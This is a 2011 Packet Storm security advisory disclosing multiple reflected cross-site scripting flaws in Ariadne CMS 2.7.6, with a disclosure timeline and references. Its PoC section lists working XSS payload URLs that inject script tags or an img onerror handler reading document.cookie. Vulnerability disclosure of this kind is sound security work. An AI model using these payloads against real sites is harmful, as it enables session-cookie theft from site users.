Ariadne 2.7.6 Cross Site Scripting

2011-12-01T00:00:00
ID PACKETSTORM:107449
Type packetstorm
Reporter Stefan Schurtz
Modified 2011-12-01T00:00:00

Description

                                        
                                            `Advisory: Ariadne 2.7.6 Multiple XSS vulnerabilities  
Advisory ID: SSCHADV2011-038  
Author: Stefan Schurtz  
Affected Software: Successfully tested on Ariadne 2.7.6  
Vendor URL: http://www.ariadne-cms.org/  
Vendor Status: informed  
  
==========================  
Vulnerability Description  
==========================  
  
Ariadne 2.7.6 is prone to multiple Cross-Site scripting vulnerabilities  
  
==================  
PoC-Exploit  
==================  
  
# IE8  
http://localhost/ariadne/www/loader.php/system/ariadne.html?'"</script><script>alert(document.cookie)</script>  
http://localhost/ariadne/www/?'"</script><script>alert(document.cookie)</script>  
http://localhost/ariadne/www/loader.php/?'"</script><script>alert(document.cookie)</script>  
http://localhost/ariadne/www/loader.php/system/?'"</script><script>alert(document.cookie)</script>  
http://localhost/ariadne/www/loader.php/view.html?'"</script><script>alert(document.cookie)</script>  
http://localhost/ariadne/www/loader.php/system/view.html?'"</script><script>alert(document.cookie)</script>  
  
# IE8/FF3.6.24/FF8.0.1  
http://localhost/ariadne/www/loader.php/system/"><iMg src=N onerror=alert(document.cookie)>  
http://localhost/ariadne/www/loader.php/"><iMg src=N onerror=alert(document.cookie)>  
  
=========  
Solution  
=========  
  
-  
  
====================  
Disclosure Timeline  
====================  
  
27-Nov-2011 - informed developers (bugs.ariadne-cms.org)  
01-Dez-2011 - release date of this security advisory  
  
========  
Credits  
========  
  
Vulnerabilities found and advisory written by Stefan Schurtz.  
  
===========  
References  
===========  
  
http://bugs.ariadne-cms.org/view.php?id=277  
http://www.rul3z.de/advisories/SSCHADV2011-038.txt  
`